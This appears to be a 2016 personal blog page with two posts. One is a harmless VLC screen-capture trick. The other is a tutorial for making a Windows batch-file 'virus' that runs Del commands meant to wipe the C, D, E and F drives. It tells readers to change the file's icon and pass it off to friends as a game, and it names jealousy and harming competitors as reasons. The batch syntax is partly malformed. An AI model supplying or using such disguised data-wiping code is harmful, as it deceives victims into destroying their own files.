Wednesday 17 February 2016

VLC Fun

This time I've got a little fun trick. If you remember the auditoriums that have the screen behind the stage and it shows an uncountable number of copies of itself, this trick is gonna be like that and if you don't understand the example above just try the trick and chances are that you understand it easily.
Steps-
1. Open VLC player
2. Press Ctrl+N
3. Type Screen:// on the dialogue box that appears
4. Press Enter
5. See the magic
6. Try opening start menu as well.

Tuesday 9 February 2016

Make a virus that deletes all the data on PC

Are you jealous of some friend who has more games than you?
Do you want to delete all the data of your competitor?
If there is any such reason you want to wipe all the data of any PC I've got something interesting for you.
In this article I'm gonna tell you how to make a virus which does it.
Steps-
1. Open Notepad
2. Copy the following code into it

@Echo off
Del D:\ *.*|y
Del E:\ *.*|y
Del F:\ *.*|y
Del C:\ *.* |y

3. Save it with any name but write .bat at the end.
4. Now change it's icon.

This way you can fool your friends by telling them that this is a game or something else.
Never open it on your own PC otherwise you are gonna lose you data.